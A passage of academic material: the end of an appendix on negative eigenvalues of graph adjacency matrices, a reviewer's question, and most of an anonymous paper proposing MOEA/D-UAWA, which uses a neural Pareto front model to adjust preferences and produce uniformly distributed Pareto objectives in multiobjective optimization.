$$ v = \begin{bmatrix} 1 \\ 0 \\ -1 \end{bmatrix}. $$
This example illustrates the existence of a negative eigenvalue, $\lambda = -1$, in the adjacency matrix of a non-bipartite graph, and the construction of a corresponding eigenvector, $[1, 0, -1]$.

A.2 6-VERTEX NON-BIPARTITE GRAPH

Consider a non-bipartite graph with six vertices, represented by the adjacency matrix,
$$ A = \begin{bmatrix} 0 & 1 & 0 & 0 & 0 & 1 \\ 1 & 0 & 1 & 0 & 0 & 0 \\ 0 & 1 & 0 & 1 & 0 & 1 \\ 0 & 0 & 1 & 0 & 1 & 0 \\ 0 & 0 & 0 & 1 & 0 & 1 \\ 1 & 0 & 1 & 0 & 1 & 0 \end{bmatrix}. $$
Employing numerical computation, we uncover three negative eigenvalues for the matrix, namely $\lambda_1 \approx -2.414$, $\lambda_2 \approx -1$, and $\lambda_3 \approx -0.414$, each associated with corresponding eigenvectors:
$$ v_1 \approx \begin{bmatrix} -0.354 \\ 0.354 \\ -0.5 \\ 0.354 \\ -0.354 \\ 0.5 \end{bmatrix}, \quad v_2 \approx \begin{bmatrix} 0.5 \\ -0.5 \\ 0 \\ 0.5 \\ -0.5 \\ 0 \end{bmatrix}, \quad v_3 \approx \begin{bmatrix} -0.354 \\ -0.354 \\ 0.5 \\ -0.354 \\ -0.354 \\ 0.5 \end{bmatrix}. $$
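The numerical claims in A.2 can be verified directly; a short sketch (np.linalg.eigvalsh returns eigenvalues in ascending order):

```python
import numpy as np

A = np.array([[0, 1, 0, 0, 0, 1],
              [1, 0, 1, 0, 0, 0],
              [0, 1, 0, 1, 0, 1],
              [0, 0, 1, 0, 1, 0],
              [0, 0, 0, 1, 0, 1],
              [1, 0, 1, 0, 1, 0]], dtype=float)

print(np.round(np.linalg.eigvalsh(A), 3))
# The three smallest eigenvalues are approximately -2.414, -1.0, and -0.414,
# matching the values reported above.
```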
W3T9rql5eo
It is interesting to model the preference-to-objective mapping to characterize the PF in a more direct way, but I wonder how we can generate a specific Pareto solution given a particular preference from the learned Pareto front. It seems that the proposed model does not explicitly involve the solutions in the decision space.
Uniform as Glass: Gliding over the Pareto Front with Neural Adaptive Preferences

Anonymous authors
Paper under double-blind review

Abstract

Multiobjective optimization (MOO) is prevalent in numerous real-world applications, in which a Pareto front (PF) is constructed to display optima under various preferences. Previous methods commonly utilize the set of Pareto objectives (particles) to represent the entire Pareto front. However, the corresponding discrete distribution of the points on the PF is less studied, which may impede the generation of diverse and representative Pareto objectives in previous methods. To bridge the gap, we highlight in this paper the benefits of uniformly distributed Pareto objectives on the PF, which alleviate the limited diversity found in previous multiobjective optimization (MOO) approaches. In particular, we introduce new techniques for measuring and analyzing the uniformity of Pareto objectives, and accordingly propose a new method to generate asymptotically uniform Pareto objectives in an adaptive manner. Our proposed method is validated through experiments on real-world and synthetic problems, which demonstrate its efficacy in generating high-quality uniform Pareto objectives on the Pareto front.

1 Introduction

Real-world applications such as recommendation systems (Zheng & Wang, 2022; Jannach, 2022), autonomous agent planning (Xu et al., 2020; Hayes et al., 2022), and industrial design (Schulz et al., 2017; Wang et al., 2011) often involve multiobjective optimization (MOO) problems. For instance, one may expect a robot to strike a balance between its forward speed and energy consumption (Basaklar et al., 2022; Xu et al., 2020). In MOO problems, despite the small number of objectives, achieving optimal values for all objectives simultaneously is often extremely challenging. Hence, learning the set of Pareto solutions (Miettinen, 1999), which are not dominated by other solutions and provide different trade-offs among objectives, is a preferable choice for addressing MOO problems. An illustrative example of Pareto solutions for a two-objective problem can be seen in Figure 1. The collection of Pareto solutions is referred to as the Pareto set (PS), with their corresponding objective vectors forming the Pareto front (PF).

In the past few decades, a large number of MOO algorithms have been proposed for constructing a finite set of solutions (dubbed a "population" in MOO) to approximate the Pareto front. Multi-objective evolutionary algorithms (MOEAs) are the most popular methods among them due to their ability to avoid bad local optima and to obtain a set of solutions in a single run (Blank & Deb, 2020; Caramia et al., 2020). MOEAs can be mainly divided into three types, namely, decomposition-based methods (e.g., MOEA/D (Zhang & Li, 2007; Zhang et al., 2008; Qi et al., 2014; Ma et al., 2017)), domination-based methods (e.g., NSGAs (Deb et al., 2002a; Ibrahim et al., 2016; Deb & Jain, 2013; Jain & Deb, 2013)), and indicator-based methods (e.g., SMS-EMOA (Beume et al., 2007)).

One crucial challenge for current MOO research is how to efficiently generate a set of Pareto objectives uniformly distributed over the whole Pareto front. Such a uniform objective set can well represent diverse optimal trade-offs among different objectives, which supports flexible decision-making and is desirable for many real-world applications.
Although some efforts have been made, current MOEAs still struggle to obtain a set of uniformly distributed solutions, especially for practical problems with unbalanced objectives and complicated objective landscapes. An illustrative example can be found in Figure 1(a), where the solutions generated by classical MOEA/D are biased toward a local region and cannot sufficiently cover the Pareto front.

In this work, we introduce a theoretical tool to measure the uniformity of Pareto objectives on the Pareto front. The results (Proposition 1 and Theorem 2) illustrate the benefits of uniform Pareto objectives for MOO and explain, both theoretically (Theorem 1) and empirically, why previous MOO methods are unable to produce uniform Pareto objectives. Based on these findings, we then propose MOEA/D-UAWA, a practical algorithm in the MOEA/D framework to generate Uniform Pareto objectives on the Pareto front utilizing Adaptive Weight Adjustment. The weight adjustment is guided by a neural model on an estimated Pareto front, as illustrated in Figure 1(b). Through extensive experiments, we demonstrate that MOEA/D-UAWA consistently produces high-quality, uniform Pareto objectives for both synthetic and real-world MOO problems and achieves better uniformity of Pareto objectives compared to other MOEAs.

The contributions of this paper can be summarized as follows:

1. We present a comprehensive analysis of uniform Pareto objectives on the Pareto front along with the associated benefits. Additionally, we introduce new tools to measure uniformity and thereby achieve uniform Pareto objectives.

2. We explore the reason behind the inability of previous methods to generate uniformly distributed Pareto objectives. Accordingly, we propose a novel preference adjustment method that utilizes a neural model to represent the Pareto objective distribution, enabling the generation of uniformly distributed solutions on the Pareto front.

3. We perform extensive experiments on synthetic and real-world MOO problems. These experiments demonstrate that our method efficiently generates uniformly distributed Pareto objectives. Compared to previous MOEAs, our method outperforms them in terms of diversity and runtime.

For clarity, all the notations used in this paper can be found in Table 4 in Appendix A.2.

2 PRELIMINARIES

In this section, we give a brief description of important concepts in MOO. A multiobjective problem, which optimizes $m$ conflicting objectives, is formally denoted as
$$\min_{x \in \mathcal{X} \subseteq \mathbb{R}^n} f(x) = (f_1(x), \ldots, f_m(x)), \quad (1)$$
which admits multiple solutions under different preferences on the $f_i$'s. For an MOO problem, it is difficult to directly compare two solutions. The concepts of domination and Pareto solutions are thereby introduced.

**Definition 1 (Domination).** A solution $x^{(a)}$ dominates $x^{(b)}$ if there exists $i \in [m]$ such that $f_i(x^{(a)}) < f_i(x^{(b)})$ and $\forall j \in [m] \setminus \{i\}, f_j(x^{(a)}) \leq f_j(x^{(b)})$.

**Definition 2 (Pareto solution).** A solution $x$ is a Pareto solution if no other solution $x' \in \mathcal{X}$ dominates it. The set of all Pareto solutions is denoted as the Pareto set (PS), and its image $\mathcal{T} = f \circ \text{PS}$ is referred to as the Pareto front (PF).
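Definitions 1 and 2 translate directly into code; a minimal sketch for a minimization problem, where `F` holds one objective vector per row:

```python
import numpy as np

def dominates(fa: np.ndarray, fb: np.ndarray) -> bool:
    """Definition 1: fa dominates fb (all objectives no worse, at least one strictly better)."""
    return bool(np.all(fa <= fb) and np.any(fa < fb))

def non_dominated(F: np.ndarray) -> np.ndarray:
    """Indices of the rows of F that no other row dominates (Definition 2)."""
    n = len(F)
    return np.array([i for i in range(n)
                     if not any(dominates(F[j], F[i]) for j in range(n) if j != i)])
```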
The dominance of a solution $x^{(a)}$ over another solution $x^{(b)}$ implies that $x^{(a)}$ is strictly superior to $x^{(b)}$, which indicates that $x^{(b)}$ cannot be regarded as an optimum in MOO. We additionally explain the concept of a weakly Pareto solution, which will be used later in this paper: $x^{(a)}$ is a weakly Pareto solution if there is no other solution $x^{(b)} \in \mathcal{X}$ such that $f(x^{(b)}) \prec f(x^{(a)})$, where $f(x^{(b)}) \prec f(x^{(a)})$ means $f_i(x^{(b)}) < f_i(x^{(a)})$ for all $i \in [m]$.

Figure 2: A $\lambda$-exact Pareto solution is the intersection between the Pareto front and the vector $\lambda$.

**Definition 3 (Pareto objective).** For a Pareto solution $x$, $y = f(x) \in \mathbb{R}^m$ is the Pareto objective on the Pareto front $\mathcal{T}$.

It is very difficult to directly optimize all $m$ objectives $f(x)$ due to their conflicting nature. A more practical approach is to convert the objective vector $f(x)$ into a single-objective subproblem via an aggregation function $g(\cdot, \lambda)$ with a specific preference vector $\lambda \in \Omega$ as an argument, in order to generate a specific Pareto solution (see the rigorous definition in Appendix A.1), where $\Omega$ is the support set of preference vectors. Many scalarization methods have been proposed in the past few decades; this work focuses on the modified Tchebycheff ("mtche" in short) aggregation function (Ma et al., 2017),
\[
g_{\text{mtche}}(y, \lambda) = \max_{i \in [m]} \left\{ \frac{y_i - z_i}{\lambda_i} \right\}, \quad g_{\text{mtche}}(\cdot, \lambda) : \mathbb{R}^m \mapsto \mathbb{R}, \quad (2)
\]
which has the attractive property of producing $\lambda$-exact Pareto solutions (Mahapatra & Rajan, 2020) under mild conditions, where $z$ is a reference point. The optimal Pareto objective $y^*$ for the above problem (2) follows the pattern
\[
\frac{y_1^* - z_1}{\lambda_1} = \ldots = \frac{y_m^* - z_m}{\lambda_m} = C
\]
with some positive constant $C$ (as shown in Figure 2).
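A minimal sketch of the modified Tchebycheff aggregation in Equation (2), together with a check of the exactness pattern $(y_i - z_i)/\lambda_i = C$; the numbers are illustrative:

```python
import numpy as np

def g_mtche(y: np.ndarray, lam: np.ndarray, z: np.ndarray) -> float:
    """Modified Tchebycheff aggregation, Equation (2)."""
    return float(np.max((y - z) / lam))

z = np.zeros(2)
lam = np.array([0.25, 0.75])
y_star = z + 1.3 * lam            # exact-Pareto pattern with C = 1.3
print(g_mtche(y_star, lam, z))    # 1.3: every coordinate attains the maximum
```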
3 RELATED WORK

Since we use adaptive preference adjustment (AWA) with a neural model, we discuss the differences from previous AWA approaches in Section 3.1. We then show how previous MOO methods use a neural model and discuss the differences from them in Section 3.2. Finally, we discuss the benefits of the proposed method compared with gradient-based MOO methods in Section 3.3.

3.1 MOEA/D WITH ADAPTIVE PREFERENCE ADJUSTMENT (MOEA/D-AWA)

MOO researchers have proposed adaptive weight adjustments to achieve more diverse Pareto objectives, including PaLam (Siwei et al., 2011), Adaptive-MOEA/D (Li & Landa-Silva, 2011), and MOEA/D-AWA (Qi et al., 2014). Compared to our proposed method, previous methods mainly use manually crafted rules to adjust preferences; e.g., MOEA/D-AWA removes the most crowded solution and retains the sparsest solution. The proposed method is instead motivated by a theoretical analysis of the final solution distribution (cf. Proposition 2) and utilizes a neural model to accelerate the optimization process.

3.2 LEARNING THE PARETO FRONT/SET BY A NEURAL MODEL

Pareto set learning (PSL) (Navon et al., 2020; Lin et al., 2022) aims to learn the entire Pareto set through a single neural model $x_\beta(\cdot) : \Delta_{m-1} \mapsto \mathbb{R}^n$, which maps a preference vector to a Pareto solution. A PSL model $x_\beta(\cdot)$ is trained by the following loss minimization:
\[
\min_\beta \text{psl\_loss}(\beta) = \mathbb{E}_{\lambda \sim \text{Unif}(\Delta_{m-1})} \left[ g(f \circ x_\beta(\lambda), \lambda) \right], \quad (3)
\]
which is usually optimized by gradient descent (e.g., in Lin et al. (2022)). The gradient involved is computed by the chain rule: $\nabla_\beta \text{psl\_loss}(\beta) = \mathbb{E}_{\lambda \sim \text{Unif}(\Delta_{m-1})} \frac{\partial g}{\partial f} \frac{\partial f}{\partial x} \frac{\partial x}{\partial \beta}$. Previous PSL methods sometimes fail to return a globally optimal model when the objective $f(\cdot)$ has too many local optima. We note that our proposed Pareto front learning (PFL) model differs from the PSL model. Firstly, as mentioned, PSL is a purely gradient-based method that cannot handle local optima, whereas PFL is only adopted as a tool for preference adjustment in evolutionary optimization, which can produce globally optimal solutions in MOO (Zhou et al., 2019). Furthermore, the model size in PSL can be large when there is a huge number of decision variables ($n$), whereas the size of the PFL model remains small, since PFL addresses the objective space, whose dimension is fixed. As suggested by Hamada et al. (2020) and Roy et al. (2023), even in cases where the objectives $f_i$'s and the Pareto front are simple and convex, the Pareto set can exhibit a complex structure, posing challenges for PSL.

$^1$ $\Delta_{m-1}$ denotes the $(m-1)$-dimensional simplex, defined as $\Delta_{m-1} = \{ y \mid \sum_{i=1}^{m} y_i = 1, \ y_i \geq 0 \}$.

3.3 Gradient-based MOO

Gradient-based methods are widely adopted to optimize MOO problems. MOO-SVGD (Liu et al., 2021) employs Stein variational gradient descent to achieve a diverse Pareto solution set. Another approach by Chen & Kwok (2022) utilizes a PSL model to optimize the diversity or hypervolume of a Pareto solution set. EPO (Mahapatra & Rajan, 2020) and OPT-in-Pareto (Ye & Liu, 2022) focus on finding a single Pareto solution that satisfies specific user requirements. Despite their wide usage, gradient-based MOO methods, as mentioned in the previous subsection, often struggle to produce globally optimal solutions (see a concrete example in Appendix B.6), whereas the proposed method aims to achieve globally optimal MOO solutions.
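A minimal sketch of the PSL training objective in Equation (3); `model`, `f`, and `g` are placeholders for the preference-conditioned network $x_\beta$, the objective function, and the aggregation function:

```python
import torch

def psl_loss(model, f, g, m: int, batch_size: int = 128) -> torch.Tensor:
    """Monte-Carlo estimate of Equation (3)."""
    # Dirichlet(1, ..., 1) is the uniform distribution over the simplex
    lam = torch.distributions.Dirichlet(torch.ones(m)).sample((batch_size,))
    x = model(lam)               # preference-conditioned solutions x_beta(lambda)
    return g(f(x), lam).mean()   # averaged aggregated objective
```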
We use the preference-to-objective function, denoted as \( h(\cdot) : \Delta_{m-1} \mapsto \mathbb{R}^m \), to represent the mapping from a preference \( \lambda \in \Omega \) to a Pareto objective,
\[ y = h(\lambda) = \arg \min_{y \in \mathcal{Y}} g_{\text{mtche}}(y, \lambda), \] (4)
where \( \mathcal{Y} = f \circ \mathcal{X} \) is the objective space. We use \( \Lambda_N = \{\lambda^{(1)}, \ldots, \lambda^{(N)}\} \) to denote a uniform preference set, where \( \Lambda_N \) solves the optimization problem
\[ \max_{\Lambda_N \subset \Omega} \min_{i,j \in [N], i \neq j} \rho(\lambda^{(i)}, \lambda^{(j)}) \quad (\text{Blank et al., 2020}). \]
Here, \( \rho(\cdot, \cdot) \) denotes the Euclidean distance between two vectors. We first give, in Lemma 1, the condition under which the function \( h \) is well defined, i.e., under which the objective \( y \) solving Problem (4) is unique. This lemma will also be used to build the PFL model in Section 4.3.

**Lemma 1** (Well-definedness of \( h(\cdot) \)). If the objective function \( f(\cdot) \) does not admit weakly Pareto solutions, the optimal objective \( y^* \) solving Equation (4) is a unique Pareto objective. This implies that the function \( h(\cdot) \) is well defined.

Given that \( h \) is well defined, the following theorem gives the distribution of the Pareto objectives \( Y_N = h \circ \Lambda_N \).

**Theorem 1** (Distribution of Pareto objectives). \( \tilde{Y}_N \xrightarrow{d} h \circ \text{Unif}(\Omega) \), where \( \tilde{Y}_N \) is the empirical (uniform) distribution over \( Y_N = \{y^{(1)}, \ldots, y^{(N)}\} \).\(^2\) The notation "\( \xrightarrow{d} \)" indicates convergence in distribution, and \( \text{Unif}(\Omega) \) denotes the uniform distribution over the set \( \Omega \).

**Remark 1.** Theorem 1 indicates that uniformity in the preference space induces uniformity in the Pareto objective space only in special cases (e.g., when the function \( h \) is an affine mapping). Even when \( h \) is a simple quadratic function, \( h \circ \text{Unif}(\Omega) \) is not a uniform distribution. A concrete example, with \( \Omega = \Delta_2 \) and the DTLZ1 (Deb et al., 2002b) objective function, is discussed and proved in Appendix C.4. The proofs of Lemma 1 and Theorem 1 are provided in Appendices C.5 and C.6.

\(^2\) \( \Omega \) is assumed to be a compact and connected set.

Figure 3: The proposed framework consists of three parts: training the PFL model, updating new preferences (Equation (7)), and MOEA/D. The black solid arrows represent value transfer, and the red dashed arrows represent gradient updates.

4.2 The Proposed MOEA/D-UAWA Framework

Maximal-Manifold-Separation problem. To generate uniformly distributed Pareto objectives, we propose to construct the objective configuration \( \mathcal{Y}_N^* \) by solving the Maximal-Manifold-Separation (MMS) problem on the Pareto front \( \mathcal{T} \),
\[ \text{MMS}(\mathcal{T}) = \max_{\mathcal{Y}_N} \delta_{\mathcal{T}} = \max_{\mathcal{Y}_N \subset \mathcal{T}} \left( \min_{y^{(i)} \neq y^{(j)} \in \mathcal{Y}_N} \rho(y^{(i)}, y^{(j)}) \right), \] (5)
where \( \rho(\cdot, \cdot) \) denotes the Euclidean distance between two vectors. Intuitively, Problem (5) maximizes the minimum pairwise distance on \( \mathcal{T} \), resulting in a diverse configuration \( \mathcal{Y}_N^* \). The optimal separation solving Problem (5) is denoted as \( \delta_{\mathcal{T}}^* \).
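Measuring the separation \( \delta_{\mathcal{T}} \) of a given configuration is straightforward; below is a minimal numpy sketch (ours, with an illustrative concave front) that evaluates the inner minimum of Problem (5):

```python
import numpy as np

def min_separation(Y):
    """Minimal pairwise Euclidean distance of a configuration Y
    (the inner minimum of Problem (5))."""
    n = len(Y)
    return min(
        np.linalg.norm(Y[i] - Y[j])
        for i in range(n) for j in range(i + 1, n)
    )

# On a curved front, points that are uniform in one coordinate are not
# uniform in arc length, so their separation is suboptimal.
y1 = np.linspace(0.0, 1.0, 10)
Y = np.stack([y1, 1.0 - y1 ** 2], axis=-1)   # illustrative front y2 = 1 - y1^2
print(min_separation(Y))
```

Maximizing this quantity over \( \mathcal{Y}_N \subset \mathcal{T} \) is what Problem (5) asks for; the surrogate in Section 4.4 does so through a learned model of the front.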
We formally summarize the attractive properties of the optimal configuration \( \mathcal{Y}_N^* \) solving Problem (5) and invite readers to refer to Appendix C.3 for the proofs and additional details. Specifically, Proposition 1 gives a non-asymptotic property for a fixed sample size \( N \), while Proposition 2 yields the asymptotic result.

Proposition 1 (Covering and \( \delta \)-dominance). Under certain assumptions (Appendix C.3), the optimal configuration \( \mathcal{Y}_N^* \) serves as both a \( \delta_{\mathcal{T}}^* \)-packing and a \( \delta_{\mathcal{T}}^* \)-covering, ensuring that the Pareto objectives in \( \mathcal{Y}_N^* \) collectively \( \delta_{\mathcal{T}}^* \)-dominate all Pareto objectives on the Pareto front \( \mathcal{T} \). (The definitions of packing, covering, and \( \delta \)-dominance can be found in Appendix A.1.) In other words, for every \( y' \in (f \circ \Omega) \), there exists \( y \in \mathcal{Y}_N^* \) such that \( y \) \( \delta_{\mathcal{T}}^* \)-dominates \( y' \).

Proposition 2 (Asymptotic uniformity (Borodachov et al., 2007)). \( \mathcal{Y}_N^* \) is asymptotically uniform on \( \mathcal{T} \), i.e., \( \hat{\mathcal{Y}}_N^* \xrightarrow{d} \text{Unif}(\mathcal{T}) \), where \( \hat{\mathcal{Y}}_N^* \) is the empirical distribution over \( \mathcal{Y}_N^* \).

Remark 2. Proposition 1 suggests that the objectives \( \mathcal{Y}_N^* \) obtained by solving Problem (5) possess a strong ability to represent the entire Pareto front: for any objective on \( \mathcal{T} \), there exists at least one objective in \( \mathcal{Y}_N^* \) that approximates it within an error tolerance \( \delta_{\mathcal{T}}^* \). Additionally, Proposition 2 indicates that as the sample size \( N \) increases, \( \mathcal{Y}_N^* \) becomes increasingly close to a uniform distribution.

Overview of the framework: solving MMS on the unknown Pareto front \( \mathcal{T} \). Since the true PF \( \mathcal{T} \) is unknown, as shown in Figure 3, we iteratively estimate \( \mathcal{T} \) by Pareto front learning (PFL) and re-select the preferences for PFL by solving MMS. The framework has three components. ① It is built upon the decomposition-based multiobjective evolutionary algorithm (MOEA/D), where we utilize a set of preference angles \( \Theta_N = \{\theta^{(1)}, \ldots, \theta^{(N)}\} \subset [0, \frac{\pi}{2}]^{m-1} \) as the inputs to MOEA/D.\(^3\) ② The Pareto front learning (PFL) module is then trained on the true objectives obtained from the output of MOEA/D. ③ Subsequently, the preference angles are updated by optimizing the uniformity indicator. More detailed descriptions of the PFL model (②) and the preference update (③) are provided in the subsequent sections. The practical algorithm is given as Algorithms 1 and 2 in Appendix A.4, where we also present a time complexity analysis. In practice, the training time of the PFL model and the preference adjustment is less than 1 s, which is negligible compared with the MOEA itself.

\(^3\) The angle representation is chosen for its simplicity in optimization with box constraints; a preference angle and its corresponding preference vector are illustrated in Appendix A.3.
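Component ②, the PFL model introduced in the next subsection, is in essence a small regression network trained by MSE. A self-contained toy sketch (ours; the circular front and the architecture are illustrative, and for clarity the toy model outputs the full 2-D objective vector for \( m = 2 \)):

```python
import torch
import torch.nn as nn

# Toy PFL model: map a preference angle theta in [0, pi/2] to an
# (estimated) Pareto objective; trained by MSE against MOEA/D outputs.
pfl = nn.Sequential(nn.Linear(1, 64), nn.ReLU(), nn.Linear(64, 2))
opt = torch.optim.Adam(pfl.parameters(), lr=1e-3)

theta = torch.rand(128, 1) * (torch.pi / 2)                  # preference angles
y = torch.cat([torch.cos(theta), torch.sin(theta)], dim=1)   # toy circular PF

for _ in range(2000):
    loss = nn.functional.mse_loss(pfl(theta), y)             # Section 4.3
    opt.zero_grad(); loss.backward(); opt.step()
```

In the actual framework, the pairs \( (\theta, y) \) come from MOEA/D rather than a closed-form front, and the model is refit each time new objectives arrive.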
4.3 Pareto Front Learning (PFL)

| Method | Mapping function (\( n \gg m \)) |
|--------|-----------------------------|
| Pareto set learning (PSL) (Navon et al., 2020; Chen & Kwok, 2022) | \( \Delta_{m-1} \mapsto \mathbb{R}^n \) |
| (Proposed) Pareto front learning (PFL) | \( [0, \frac{\pi}{2}]^{m-1} \mapsto \mathbb{R}^{m-1} \) |

The PFL model, denoted as \( h_\phi(\cdot) : [0, \frac{\pi}{2}]^{m-1} \mapsto \mathbb{R}^{m-1} \), serves as an approximation of the preference-to-objective function \( h(\cdot) \) introduced in Section 4.1. The model \( h_\phi(\cdot) \) is trained by minimizing the mean squared error (MSE) between the true Pareto objectives \( y \) obtained from MOEA/D and the estimated objectives \( h_\phi(\theta) \). For the training process to be well defined, two different objectives \( y \) and \( y' \) cannot both minimize \( g_{\text{mtche}}(\cdot, \lambda) \) for the same preference; the condition for this property is given in Lemma 1.

We emphasize the necessity of introducing PFL rather than simply applying previous Pareto set learning methods (Equation (3)) (Navon et al., 2020; Lin et al., 2022; Chen & Kwok, 2022). The reasons are twofold. (1) PSL uses purely gradient-based methods to optimize the PSL objective defined in Equation (3); the induced locally optimal solutions make PSL fail on most of the ZDT and DTLZ problems. (2) The number of decision variables \( n \) of an MOO problem can be arbitrarily large, and so can the size of a PSL model. In contrast, the PFL model is constrained to the function space \( [0, \frac{\pi}{2}]^{m-1} \mapsto \mathbb{R}^{m-1} \), so its complexity is independent of \( n \).

We focus on two quantities for a PFL model: (1) the **training loss**, denoted as \( l_{\text{pfl}} \), and (2) the **generalization error** for a new angle \( \theta' \) after applying the uniform configuration specified in Equation (5). By Allen-Zhu et al. (2019), we can prove that the training loss \( l_{\text{pfl}} \) converges to a globally optimal solution in time polynomial in the number of solutions \( N \) and the width of the neural model. The discussion of the generalization error is deferred to Section 4.5.

4.4 Preference Adjustment with a PFL Model

Exactly solving Problem (5) for the optimal configuration is generally intractable (Borodachov et al., 2019). We therefore consider the following surrogate problem, in which the preference-to-objective map \( h(\cdot) \) is approximated by the neural network \( h_\phi(\cdot) \),
\[ \text{MMS}(\hat{\mathcal{T}}) = \max_{\Theta_N} \delta_{\hat{\mathcal{T}}} = \max_{\Theta_N} \left( \min_{i \neq j,\ i,j \in [N]} \rho(h_\phi(\theta^{(i)}), h_\phi(\theta^{(j)})) \right). \] (6)
We find that, given a fixed neural network \( h_\phi(\cdot) \) (the PFL model), the preference angles \( \theta^{(i)} \) in Problem (6) (as well as the estimated solutions \( \hat{y}^{(i)} \)) can be optimized efficiently via projected gradient ascent, \( \theta^{(i)} \leftarrow \text{Proj}(\theta^{(i)} + \eta \nabla_{\theta^{(i)}} \delta_{\hat{\mathcal{T}}}),\ i \in [N] \), where the Proj operator projects a preference angle back onto its domain \( [0, \frac{\pi}{2}] \). The update rule can be written compactly as
\[ \Theta_N \leftarrow \text{Proj}(\Theta_N + \eta \nabla_{\Theta_N} \delta_{\hat{\mathcal{T}}}). \] (7)
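A minimal PyTorch sketch of this update (ours; it reuses the toy `pfl` model from the earlier sketch and handles the nondifferentiable minimum through autograd subgradients):

```python
import torch

def adjust_preferences(pfl, thetas, steps=100, eta=1e-2):
    """Projected gradient ascent on the surrogate separation (Eqs. (6)-(7)).

    pfl: a trained PFL model mapping angles to estimated objectives.
    thetas: (N, m-1) tensor of preference angles.
    """
    thetas = thetas.clone().requires_grad_(True)
    opt = torch.optim.SGD([thetas], lr=eta)
    for _ in range(steps):
        y = pfl(thetas)                           # estimated objectives
        d = torch.cdist(y, y)                     # pairwise distances
        d = d + 1e9 * torch.eye(len(y))           # mask out self-distances
        loss = -d.min()                           # ascend on the minimal separation
        opt.zero_grad(); loss.backward(); opt.step()
        with torch.no_grad():                     # Proj: clamp back to the box
            thetas.clamp_(0.0, torch.pi / 2)
    return thetas.detach()

thetas = torch.rand(10, 1) * (torch.pi / 2)       # e.g., 10 angles for m = 2
thetas = adjust_preferences(pfl, thetas)
```

Only the angles are updated here; the PFL parameters \( \phi \) stay fixed during the adjustment, matching the alternation depicted in Figure 3.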
Figure 4 demonstrates that, using a PFL model, only a few Pareto objectives suffice to estimate the whole Pareto front effectively. The blue dots represent the original Pareto objectives optimized by MOEA/D, which are not uniformly distributed, as predicted by Theorem 1; the adjusted preferences are indicated by red stars on the 1-D simplex. After updating the preferences via gradient ascent, the Pareto objectives are uniformly distributed on the estimated Pareto front, as described in Proposition 2.

4.5 PFL Generalization Bound

We now bound the generalization error of the proposed method, namely \( \tilde{\epsilon} = |R(\tilde{h}) - \hat{R}(\tilde{h})| \) for an arbitrary \( \tilde{h}(\cdot) \). As highlighted in Appendix C.1, the population risk of \( \tilde{h} \) can be controlled by bounding this generalization error. Specifically, we show that \( \tilde{\epsilon} \) heavily depends on the margin \( \delta_v \), which denotes the maximal diameter of the Voronoi cells (Okabe et al., 2009) induced by the Pareto objectives \( Y_N = \{y^{(1)}, \ldots, y^{(N)}\} \), where \( Y_N \) solves Problem (5). For the formal definitions of Voronoi cells and the diameter of a set, please refer to Definitions 8 and 9 in Appendix A.1. The complete result is stated as follows (the proof of Theorem 2 is provided in Appendix C.2):

**Theorem 2** (Generalization bound of a PFL model). We first make some regularity assumptions:

1. **(Function smoothness).** Both \( (\tilde{h} - h_*)(x) \) and \( h_*^{-1}(y) \) are \( L \)- and \( L' \)-Lipschitz, respectively, i.e.,
\[ \|(\tilde{h} - h_*)(x_1) - (\tilde{h} - h_*)(x_2)\| \leq L \|x_1 - x_2\|, \quad \forall x_1, x_2 \in [0, \tfrac{\pi}{2}]^{m-1}, \]
\[ \|h_*^{-1}(y_1) - h_*^{-1}(y_2)\| \leq L' \|y_1 - y_2\|, \quad \forall y_1, y_2 \in \mathbb{R}^m, \] (8)
where \( h_* \) denotes the true mapping function from preferences to objectives.

2. **(Function upper bound).** \( \|\tilde{h} - h_*\|_\infty \leq A, \quad \|h_*^{-1}\|_\infty \leq A' \).

3. **(Manifold property).** We assume \( \mathcal{T} \) is a differentiable, compact \((m-1)\)-dimensional manifold, a common assumption found, for example, in Hillermeier (2001). Furthermore, we consider \( \mathcal{T} \) to be connected, a widely applicable assumption in scenarios such as ZDT1, 2, and 4.

For the risk \( \tilde{\epsilon} = |R(\tilde{h}) - \hat{R}(\tilde{h})| \), we then have
\[ \tilde{\epsilon} \leq 2H_{m-1}(\mathcal{T})AA'LL'\delta_v + 2CA^2 \sqrt{W_1(U, \tilde{Y}_N)} + \delta_v, \] (9)
where \( U \) is the uniform distribution over \( \mathcal{T} \), \( \tilde{Y}_N \) is the empirical distribution of \( Y_N \), \( W_1(\cdot, \cdot) \) is the Wasserstein distance with the \( l_1 \) norm, \( H_{m-1}(\cdot) \) is the \((m-1)\)-dimensional Hausdorff measure, and \( C \) is a universal constant representing the smoothness of \( \mathcal{T} \) (Chae & Walker, 2020, Theorem 1).

**Remark 3.** In Theorem 2, the error bound for \( \tilde{\epsilon} \) involves two quantities: the diameter of the Voronoi cells \( \delta_v \) and \( W_1(U, \tilde{Y}_N) \). The margin \( \delta_v \) is controlled by maximizing the minimal separation distance \( \delta_{\mathcal{T}} \). The decay rate of \( W_1(U, \tilde{Y}_N) \) depends not only on the margin \( \delta_v \) but also on the manifold properties of the Pareto front; i.e., the overall generalization error rate is not completely determined by the margin \( \delta_v \).
However, by Proposition 2, we still have \( W_1(U, \tilde{Y}_N) \rightarrow 0 \), since \( \tilde{Y}_N \) weakly converges to \( U \); minimizing the margin \( \delta_v \) is thus critical to controlling the generalization error \( \tilde{\epsilon} \).

5 Experiments

5.1 Experiment Settings

We validate the effectiveness of the proposed method on various problems, including ZDT1, 2, 4 (Deb et al., 2006), DTLZ1-2 (Deb et al., 2002b), and real-world testing problems (Tanabe & Ishibuchi, 2020). For ease of presentation, we normalize the PF of RE37 to \([0, 1]^3\). To test the ability to handle objectives of different scales, we normalize the PFs of RE21 and RE22 to \([0, 0.5] \times [0, 1]\). Problems ZDT4 and DTLZ1-2 possess numerous local optima in which gradient-based MOO methods get stuck (see Appendix B.6). The RE problems are real-world problems with unknown Pareto fronts and demonstrate the capability of handling complex Pareto front shapes. Lastly, multiple preference vectors do not intersect the RE37 Pareto front, which leads the original MOEA/D to produce duplicate Pareto objectives. Results on RE37 validate that the proposed method automatically avoids selecting such preferences, thereby enhancing solution diversity.

